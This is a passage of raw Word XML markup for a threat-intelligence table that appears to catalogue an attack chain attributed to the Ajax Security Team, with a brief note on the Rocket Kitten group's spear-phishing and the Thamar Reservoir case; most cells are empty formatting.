          <w:p w14:paraId="28FA93B7" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00005982" w:rsidRPr="00B857D7" w14:paraId="037610FC" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="730FA5F3" w14:textId="77777777" w:rsidR="00005982" w:rsidRDefault="00005982" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A5E4DEB" w14:textId="77777777" w:rsidR="00005982" w:rsidRDefault="00005982" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2015</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EE006EA" w14:textId="77777777" w:rsidR="00005982" w:rsidRDefault="00005982" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="25"/>
      <w:tr w:rsidR="00005982" w:rsidRPr="00B857D7" w14:paraId="1F65911E" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63763C15" w14:textId="77777777" w:rsidR="00005982" w:rsidRDefault="00005982" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49EBD5BC" w14:textId="77777777" w:rsidR="00005982" w:rsidRDefault="00005982" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77735A8B" w14:textId="77777777" w:rsidR="00005982" w:rsidRDefault="00005982" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="167CE0E0" w14:textId="77777777" w:rsidR="00005982" w:rsidRPr="00AC7A85" w:rsidRDefault="00005982" w:rsidP="00005982"/>
    <w:p w14:paraId="4FCBB4F6" w14:textId="77777777" w:rsidR="00005982" w:rsidRDefault="00005982" w:rsidP="00005982">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525"/>
        <w:gridCol w:w="661"/>
        <w:gridCol w:w="699"/>
        <w:gridCol w:w="557"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="2621"/>
      </w:tblGrid>
      <w:tr w:rsidR="0069253B" w:rsidRPr="002D1D50" w14:paraId="60DBF27B" w14:textId="77777777" w:rsidTr="00775D24">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="055F36C5" w14:textId="77777777" w:rsidR="0069253B" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="30C4E73B" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="002D1D50" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0CE78DBB" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="002D1D50" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="26" w:name="OLE_LINK22"/>
            <w:r w:rsidRPr="008A37A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ajax</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r w:rsidRPr="008A37A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Security</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r w:rsidRPr="008A37A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Team</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>_001</w:t>
            </w:r>
            <w:bookmarkEnd w:id="26"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2A34F838" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="002D1D50" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4D233DCB" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="002D1D50" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5C0674D7" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="002D1D50" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7EBD4766" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="002D1D50" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2621" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3E691874" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="002D1D50" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069253B" w:rsidRPr="002D1D50" w14:paraId="1B535BE0" w14:textId="77777777" w:rsidTr="00775D24">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70F23870" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="002D1D50" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="176C2623" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="002D1D50" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2525" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AFFD386" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="002D1D50" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3362881C" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="002D1D50" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="660C5823" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="002D1D50" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="029E18E0" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="002D1D50" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="062CFAE8" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="002D1D50" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2621" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06A24C3C" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="002D1D50" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069253B" w:rsidRPr="002D1D50" w14:paraId="1BC84683" w14:textId="77777777" w:rsidTr="00775D24">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67F872E6" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="002D1D50" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="27" w:name="OLE_LINK23"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="415CC24A" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="002D1D50" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2525" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E965778" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="002D1D50" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08A64E1F" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="002D1D50" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F0F9F3A" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="002D1D50" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="455C551A" w14:textId="4FC207D9" w:rsidR="0069253B" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/</w:t>
            </w:r>
            <w:r w:rsidR="00AD2F65">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0239A8FB" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="002D1D50" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC</w:t>
            </w:r>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2621" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79145330" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="002D1D50" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069253B" w:rsidRPr="00B857D7" w14:paraId="4968C5F2" w14:textId="77777777" w:rsidTr="00775D24">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D45D38C" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="00B857D7" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AD19866" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="00B857D7" w:rsidRDefault="0069253B" w:rsidP="00EC371F">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525" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45D04251" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="00B857D7" w:rsidRDefault="0069253B" w:rsidP="00EC371F">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1" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="618CFF48" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="00B857D7" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="792A4F89" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="00B857D7" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="673A2790" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="00B857D7" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D0CB5A0" w14:textId="1F0DC042" w:rsidR="0069253B" w:rsidRPr="00B857D7" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL/IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2621" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BA08DB3" w14:textId="35F72079" w:rsidR="0069253B" w:rsidRPr="00B857D7" w:rsidRDefault="0069253B" w:rsidP="008E1133">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="007A76C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>The Rocket Kitten attacker group’s main attack vector is spear-</w:t>
            </w:r>
            <w:r w:rsidRPr="007A76C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>phishing.</w:t>
            </w:r>
            <w:r w:rsidR="008E1133">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="0069253B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">The Thamar </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0069253B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Gindin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0069253B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> case: Thamar Reservoir</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069253B" w:rsidRPr="00B857D7" w14:paraId="46608971" w14:textId="77777777" w:rsidTr="00775D24">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="537EBE6A" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="00B857D7" w:rsidRDefault="0069253B" w:rsidP="00EC371F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="405BB8C2" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="00B857D7" w:rsidRDefault="0069253B" w:rsidP="00EC371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525" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19CBB28F" w14:textId="77777777" w:rsidR="0069253B" w:rsidRPr="00B857D7" w:rsidRDefault="0069253B" w:rsidP="00EC371F">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1" w:type="dxa"/>
          </w:tcPr>
